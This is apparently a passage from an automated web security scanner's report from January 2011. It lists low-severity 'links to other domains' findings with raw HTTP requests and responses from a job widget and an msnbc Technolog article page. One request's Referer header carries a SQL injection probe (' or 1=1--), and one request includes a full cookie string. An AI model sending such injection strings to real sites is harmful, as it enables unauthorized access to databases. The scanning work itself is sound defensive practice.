<a href="http://openid.net/what/" target="_blank">learn more &raquo;</a>
...[SNIP]...
</a> |

<a href="http://data.stackexchange.com">data</a> |
<a href="http://itc.conversationsnetwork.org/series/stackoverflow.html">podcast</a>
...[SNIP]...
</a> |
<a href="http://engine.adzerk.net/redirect/0/2776/2751/0/4de3c60f719c4dfcb1a57531c7050090/0">advertising info</a>
...[SNIP]...
</span>&nbsp;<a href="http://stackapps.com">api/apps</a>
...[SNIP]...
</span>&nbsp;<a href="http://serverfault.com">serverfault.com</a>
...[SNIP]...
</span>&nbsp;<a href="http://superuser.com">superuser.com</a>
...[SNIP]...
</span>&nbsp;<a href="http://area51.stackexchange.com">area&nbsp;51</a>
...[SNIP]...
</span>&nbsp;<a href="http://webapps.stackexchange.com">webapps</a>
...[SNIP]...
</span>&nbsp;<a href="http://gaming.stackexchange.com">gaming</a>
...[SNIP]...
</span>&nbsp;<a href="http://askubuntu.com">ubuntu</a>
...[SNIP]...
</span>&nbsp;<a href="http://webmasters.stackexchange.com">webmasters</a>
...[SNIP]...
</span>&nbsp;<a href="http://cooking.stackexchange.com">cooking</a>
...[SNIP]...
</span>&nbsp;<a href="http://gamedev.stackexchange.com">game development</a>
...[SNIP]...
</span>&nbsp;<a href="http://math.stackexchange.com">math</a>
...[SNIP]...
</span>&nbsp;<a href="http://photo.stackexchange.com">photography</a>
...[SNIP]...
</span>&nbsp;<a href="http://stats.stackexchange.com">stats</a>
...[SNIP]...
</span>&nbsp;<a href="http://tex.stackexchange.com">tex</a>
...[SNIP]...
</span>&nbsp;<a href="http://english.stackexchange.com">english</a>
...[SNIP]...
</span>&nbsp;<a href="http://cstheory.stackexchange.com">theoretical cs</a>
...[SNIP]...
</span>&nbsp;<a href="http://programmers.stackexchange.com">programmers</a>
...[SNIP]...
</span>&nbsp;<a href="http://unix.stackexchange.com">unix</a>
...[SNIP]...
</span>&nbsp;<a href="http://apple.stackexchange.com">apple</a>
...[SNIP]...
<div id="footer-flair">
    <a href="http://creativecommons.org/licenses/by-sa/2.5/" class="cc-wiki-link"></a>
...[SNIP]...
</a> licensed under <a href="http://creativecommons.org/licenses/by-sa/2.5/" rel="license">cc-wiki</a>
...[SNIP]...
<div id="noscript-warning">Stack Overflow works best with JavaScript enabled<img src="http://pixel.quantserve.com/pixel/p-c1rF4kxgLUzNc.gif" alt="" class="dno"></div>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

22.340. http://syndication.jobthread.com/jt/syndication/page.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://syndication.jobthread.com
Path:   /jt/syndication/page.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /jt/syndication/page.php?url_directory=&type=jobroll&s_domain_name=jobs.popsci.com&num_jobs=3&num_featured_jobs=0&display_method=default&template_name=popsci1&version=2.0 HTTP/1.1
Host: syndication.jobthread.com
Proxy-Connection: keep-alive
Referer: http://www.popsci.com/?172683569'%20or%201%3d1--%20=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:16:05 GMT
Server: Apache/2
Vary: Host,Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 1723


   document.write('<div class="content"><div style="background:url(\'http://static.jobthread.com/files/site_images/727999/727999_popsci-jobs-widget.png\') no-repeat 0 0;height:24px;width:340px;"></div><div style="margin:5px;"> <a href="http://jobs.popsci.com/job/senior-level-ii-support-dallas-tx-frontline-source-group-529b8b975d/?d=1&amp;source=jobroll">Senior Level II Support</a>
...[SNIP]...
<br style="margin-bottom:10px;"> <a href="http://jobs.popsci.com/job/warehouse-engineer-farmers-branch-tx-frontline-source-group-647f94c9ac/?d=1&amp;source=jobroll">Warehouse Engineer</a>
...[SNIP]...
<br style="margin-bottom:10px;"> <a href="http://jobs.popsci.com/job/test-engineer-plano-tx-frontline-source-group-1e9dc02e44/?d=1&amp;source=jobroll">Test Engineer</a>
...[SNIP]...
<div style="float:left;clear:none;width:150px;margin-top:5px;"><a href="http://jobs.popsci.com/">More Jobs</a>&nbsp;|&nbsp;<a href="http://jobs.popsci.com/post">Post a Job</a>
...[SNIP]...

22.341. http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore/

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore/?GT1=43001 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Location: http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore?GT1=43001
Content-Type: text/html
Cache-Control: max-age=295
Date: Sun, 30 Jan 2011 16:58:40 GMT
Connection: close

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog - T-Pain's Face
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="RSS" href="http://technolog.msnbc.redacted/_feeds/rss2/author" />
<link class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/39f49614ef57bfa39918e852b69f13f139a7e311.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/e89cb27add8a8bec4ff014077d76236c84e0ee2e.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/895677dfabd5df38e5ee57c63c4a6f9ac2e2fff9.js?v=23247"></script>
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/abstractmartinblog/base.css?v=23247" />
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/abstractmartinblog/style.css?v=23247" />
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=c5942663&amp;rand=1024084339&amp;do=msnbc.redacted&amp;rf=http%3A%2F%2Fwww.redacted%2F&amp;ad=53:9:80;44::;56:27:108;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>
...[SNIP]...
<li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a>
...[SNIP]...
<li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
...[SNIP]...
<li class="i7"><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li class="i9"><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li class="i18"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" target="_blank">Feedback</a>
...[SNIP]...
<li class="i19"><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li class="i20"><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li id="bing" class="i3 bing"><a href="http://www.bing.com"><span>
...[SNIP]...
<li class="i2 show-today"><a href="http://today.msnbc.com/">TODAY</a></li>
           <li class="i3 show-nightly"><a href="http://nightly.msnbc.com/">Nightly News</a>
...[SNIP]...
<li class="i4 show-mtp"><a href="http://mtp.msnbc.com/">Meet the Press</a>
...[SNIP]...
<li class="i5 show-dateline"><a href="http://dateline.msnbc.com/">Dateline</a>
...[SNIP]...
<li class="i6 show-maddow"><a href="http://rachel.msnbc.com/">Maddow</a>
...[SNIP]...
<li class="i8 show-hardball"><a href="http://hardball.msnbc.com/">Hardball</a>
...[SNIP]...
<li class="i9 show-msnbc"><a href="http://tv.msnbc.com/">msnbc tv</a>
...[SNIP]...
<li class="i10 site-newsvine"><a href="http://www.newsvine.com/">Newsvine</a>
...[SNIP]...
<li class="i11 site-everyblock"><a href="http://www.everyblock.com/">EveryBlock</a>
...[SNIP]...
<li class="email_subscribe_option"><a href="https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-email.png" width="19" height="18" alt="Icons Email"> Receive e-mail updates</a>
...[SNIP]...
</div><a href="https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted">change this</a>
...[SNIP]...
<div class="spinner hide"><img src="http://www.polls.newsvine.com/_vine/images/__/spinner.gif" width="16" height="16" alt="Loading" /> Saving...</div>
...[SNIP]...
<a href="http://technolog.msnbc.redacted/_feeds/rss2/author"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-feed.png" width="18" height="18" alt="Icons Feed"> Subscribe to RSS</a>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=button_count&amp;show_faces=false&amp;width=90&amp;action=like&amp;colorscheme=light&amp;href=http://www.facebook.com/pages/Technolog/108546889203630" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:90px; height:20px"></iframe>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
<div id="vine-inlinePhoto__5942669" data-contentId="5942669" class="inlinePhoto photo_portrait photo_align_block user_inline_photo" style="width:600px;"><img id="helenaspopkin/5942669.jpg" src="http://www.polls.newsvine.com/_vine/images/users/600/helenaspopkin/5942669.jpg" width="600" height="672" alt="" /><p class="photo_credit">
...[SNIP]...
<p>Anyhoo &hellip; T-Pain really likes Facebook too &hellip; at least his latest tattoo indicates such. The Grammy-winning hip-hop artist shared a picture of his new ink on Twitter today, <a href="http://twitter.com/#!/NBTPAIN/status/30855244816584704">with this explanation </a>
...[SNIP]...
<div id="vine-inlinePhoto__5942671" data-contentId="5942671" class="inlinePhoto photo_portrait photo_align_block user_inline_photo" style="width:238px;"><img id="helenaspopkin/5942671.jpg" src="http://www.polls.newsvine.com/_vine/images/users/600/helenaspopkin/5942671.jpg" width="238" height="320" alt="" /><!-- end5942671 -->
...[SNIP]...
</param><embed src="http://www.youtube.com/v/w0nFpwPuk8E&amp;hl=en_US&amp;fs=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="600" height="429"></embed>
...[SNIP]...
<em>Helen A.S. Popkin writes about the Internet ... a lot. Follow&nbsp;her on <a href="http://twitter.com/helenaspopkin"><span>
...[SNIP]...
</a> and/or <a href="http://www.facebook.com/pages/manage/#!/pages/Helen-AS-Popkin/120508047967128"><span>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore" data-Text="T-Pain's Facebook tattoo so hardcore, it's hexacore!">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&amp;show_faces=true&amp;width=480&amp;action=recommend&amp;colorscheme=light&amp;href=http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<div class="normal"><a href="http://biggie2221635.newsvine.com/">biggie-2221635</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="newsvine"><a href="http://tyler.newsvine.com/">tyler</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://waynej.newsvine.com/">waynejohn</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Davethedoubter.newsvine.com/">Dave the doubter</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://MInOTown.newsvine.com/">M In O Town</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://ljrhodes.newsvine.com/">L.J. Rhodes</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://John875667.newsvine.com/">John-875667</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Darthdon.newsvine.com/">Darthdon</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://aquatone.newsvine.com/">aquatone</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="privacytext"><a href="http://www.newsvine.com/_nv/cms/info/privacyPolicy" target="_blank">Newsvine Privacy Statement</a></div><img class="postCommentImage" src="http://www.polls.newsvine.com/_vine/images/_/b_postcomment.gif" /><img class="postingCommentImage" src="http://www.polls.newsvine.com/_vine/images/_/b_posting.gif" /></div>
...[SNIP]...
<div class="newuser">As a new user, you may notice a few temporary content restrictions. <a href="http://www.newsvine.com/_nv/cms/help/newUsers" target="_blank">Click here for more info</a>
...[SNIP]...
<span><img src="http://www.polls.newsvine.com/_vine/images/_/icon_track_mini.gif" width="12" height="12" alt="Start Tracking" title="Add this article to your conversation tracker without commenting on it" />Start Tracking</span>
...[SNIP]...
<span><img src="http://www.polls.newsvine.com/_vine/images/_/icon_stop_mini.gif" width="10" height="10" alt="Stop Tracking" />Stop Tracking</span>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="avatar"><a href="http://michaelwann.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/michaelwann-318009268.jpg" width="60" height="60" /></a>
...[SNIP]...
<li class="twitter"><a href="http://twitter.com/MichaelWann">Follow on Twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://technolog2.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/wjrothman-1049670252.jpg" width="60" height="60" /></a>
...[SNIP]...
from Time and the NYT to the notorious tech blog Gizmodo, where he was features editor for three years. He is not an Apple fanboy, but sometimes he is mistaken for one. You can stalk him on Twitter at <a href="http://twitter.com/wjrothman">@wjrothman</a>
...[SNIP]...
<li class="twitter"><a href="http://twitter.com/wjrothman">Follow on Twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://helenaspopkin.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/helenaspopkin-1308146463.jpg" width="60" height="60" /></a>
...[SNIP]...
<li class="twitter"><a href="http://twitter.com/HelenASPopkin">Follow on Twitter</a>
...[SNIP]...
<li class="facebook"><a href="http://www.facebook.com/HelenASPopkin">Become a fan on Facebook</a>
...[SNIP]...
<div class="avatar"><a href="http://suzanne-choney.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/suzanne-choney-604078999.jpg" width="60" height="60" /></a>
...[SNIP]...
<li class="twitter"><a href="http://www.twitter.com/suzannechoney">Follow on Twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://alex-johnson.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/alex-johnson-743865123.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://malexj.wordpress.com/">Editor at Large</a>
...[SNIP]...
<li class="follow on twitter"><a href="http://www.twitter.com/MAlexJohnson">Follow on Twitter</a>
...[SNIP]...
<li class="follow on facebook"><a href="http://malexj.tk/6M">Follow on Facebook</a>
...[SNIP]...
<div class="avatar"><a href="http://redtape.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/redtape-920134022.jpg" width="60" height="60" /></a>
...[SNIP]...
<div class="avatar"><a href="http://boyle.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/boyle-747955448.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://blogs.discovermagazine.com/badastronomy/">Bad Astronomy</a>
...[SNIP]...
<li><a href="http://www.collectspace.com/">CollectSpace</a>
...[SNIP]...
<li><a href="http://blogs.discovermagazine.com/cosmicvariance/">Cosmic Variance</a>
...[SNIP]...
<li><a href="http://curmudgeons.blogspot.com/">Curmudgeons Corner</a>
...[SNIP]...
<li><a href="http://news.discovery.com/">Discovery News</a>
...[SNIP]...
<li><a href="http://www.dailygrail.com/">The Daily Grail</a>
...[SNIP]...
<li><a href="http://earthsky.org/">EarthSky</a></li><li><a href="http://www.geekpress.com/">GeekPress</a></li><li><a href="http://www.habitablezone.com/space/">Habitable Zone</a>
...[SNIP]...
<li><a href="http://www.hobbyspace.com/">HobbySpace Log</a>
...[SNIP]...
<li><a href="http://www.livescience.com/">LiveScience</a>
...[SNIP]...
<li><a href="http://blogs.discovermagazine.com/loom/">The Loom</a></li><li><a href="http://www.nasawatch.com/">NASA Watch</a></li><li><a href="http://www.nasaspaceflight.com/">NASA Spaceflight</a>
...[SNIP]...
<li><a href="http://www.outofthecradle.net/">Out of the Cradle</a>
...[SNIP]...
<li><a href="http://www.scidev.net/">SciDev.net</a></li><li><a href="http://www.scienceblog.com/cms/index.php">Science Blog</a>
...[SNIP]...
<li><a href="http://www.scienceblogs.com/">ScienceBlogs</a>
...[SNIP]...
<li><a href="http://www.signonsandiego.com/news/blogs/science-quest/">Science Quest</a>
...[SNIP]...
<li><a href="http://www.scientificamerican.com/blog/observations/">SciAm Observations</a>
...[SNIP]...
<li><a href="http://seedmagazine.com/">Seed Magazine</a>
...[SNIP]...
<li><a href="http://science.slashdot.org">Slashdot Science</a>
...[SNIP]...
<li><a href="http://www.space.com/">Space.com</a></li><li><a href="http://www.spacedaily.com/">Spaceflight Now</a>
...[SNIP]...
<li><a href="http://spacefellowship.com/">Space Fellowship</a>
...[SNIP]...
<li><a href="http://www.thespacereview.com/">The Space Review</a>
...[SNIP]...
<li><a href="http://www.transterrestrial.com/">Transterrestrial Musings</a>
...[SNIP]...
<li><a href="http://http://www.universetoday.com/">Universe Today</a>
...[SNIP]...
<li><a href="http://www.unmannedspaceflight.com">Unmanned Spaceflight</a>
...[SNIP]...
<li><a href="http://trueslant.com/milesobrien/">Uplink by Miles O'Brien</a>
...[SNIP]...
<li><a href="http://planetary.org/blog">Planetary Society Blog</a>
...[SNIP]...
<li><a href="http://www.sciencenews.org/">Science News</a>
...[SNIP]...
<li><a href="http://www.popularmechanics.com/">Popular Mechanics</a>
...[SNIP]...
<li><a href="http://www.popsci.com/">Popular Science</a>
...[SNIP]...
<li><a href="http://news.sciencemag.org/scienceinsider/">Science Insider</a>
...[SNIP]...
<li><a href="http://nasaengineer.com/">NASAEngineer.com</a>
...[SNIP]...
<li><a href="http://eurekalert.org/">EurekAlert</a></li><li><a href="http://blogs.nature.com/news/thegreatbeyond/">Nature: The Great Beyond</a>
...[SNIP]...
<li><a href="http://www.spacedaily.com/">Space Daily</a>
...[SNIP]...
<li><a href="http://www.spacepolitics.com">Space Politics</a>
...[SNIP]...
<div class="rawhtml_contents clearer clearfix rawhtml_BlogAuthorPromo"><a href="http://www.thecaseforpluto.com/" title="The Case for Pluto"><img src="http://www.thecaseforpluto.com/cover.jpg" width="85" height="129" align="left" border="0" style="padding:0 10px 10px 0;" /></a>Alan Boyle's first book tells the story of Pluto's ups and downs as well as the discoveries of other dwarf planets in our own solar system and even more alien worlds beyond. <a href="http://www.thecaseforpluto.com/" title="The Case for Pluto">Buy "The Case for Pluto" ...</a>
...[SNIP]...
<div class="avatar"><a href="http://wbenedetti.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/WBenedetti-689965150.jpg" width="60" height="60" /></a>
...[SNIP]...
<li class="follow winda benedetti on twitter"><a href="http://twitter.com/windabenedetti">follow Winda Benedetti on Twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://toddkenreck.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/toddkenreck-1044151231.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://ingame.newsvine.com/">In-Game</a>
...[SNIP]...
<li class="todd kenreck on facebook"><a href="http://www.facebook.com/todd.kenreck">Todd Kenreck on facebook</a>
...[SNIP]...
<li class="todd kenreck on twitter"><a href="https://twitter.com/ToddKenreck">Todd Kenreck on twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://athima-chansanchai.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/athima-chansanchai-1539646533.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://redtape.msnbc.com/">Red Tape Chronicles</a>
...[SNIP]...
<a href="http://www.msnbc.redacted/"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/msnbc-logo.png" alt="msnbc.com" width="166" height="20"></a>
...[SNIP]...
<li>
                   <a href="http://privacy.microsoft.com/en-us/default.aspx?SU=http://msnbc.redacted/">MSN Privacy</a>
...[SNIP]...
<li>
                   <a href="http://help.live.com/help.aspx?project=tou&amp;mkt=en-us">Legal</a>
...[SNIP]...
</div><link rel="stylesheet" type="text/css" href="http://lib.newsvine.com/Pierre/widgets/wetbar/wetbar.css">
<script type="text/javascript" language="JavaScript">
...[SNIP]...

22.342. http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore/?GT1=43001 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Location: http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore?GT1=43001
Content-Type: text/html
Cache-Control: max-age=297
Date: Sun, 30 Jan 2011 01:51:07 GMT
Connection: close

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog - T-Pain's Face
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="RSS" href="http://technolog.msnbc.redacted/_feeds/rss2/author" />
<link class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/39f49614ef57bfa39918e852b69f13f139a7e311.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/e89cb27add8a8bec4ff014077d76236c84e0ee2e.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/895677dfabd5df38e5ee57c63c4a6f9ac2e2fff9.js?v=23247"></script>
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/abstractmartinblog/base.css?v=23247" />
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/abstractmartinblog/style.css?v=23247" />
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
